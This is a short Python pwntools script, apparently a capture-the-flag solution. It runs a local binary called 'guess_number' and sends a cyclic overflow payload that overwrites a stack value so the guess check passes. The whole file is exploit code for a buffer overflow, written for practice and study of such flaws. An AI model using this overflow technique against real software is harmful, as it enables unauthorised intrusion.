#!/usr/bin/env python
# -*- coding: utf-8 -*-
__Auther__ = 'M4x'

from pwn import *
context.log_level = "debug"

io = process("./guess_number")

payload = cyclic(0x10C + 0x8) + p32(0)

io.sendlineafter("guess:", payload)
print io.recvall()
io.close()
